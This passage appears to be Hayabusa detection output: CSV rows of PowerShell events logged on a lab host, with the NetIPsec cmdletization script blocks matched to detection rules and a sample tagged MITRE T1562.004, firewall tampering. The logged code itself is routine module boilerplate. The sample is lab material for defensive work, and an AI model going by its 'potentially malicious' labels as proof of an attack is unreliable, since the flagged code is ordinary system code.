$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.280 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.281 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.282 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.285 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 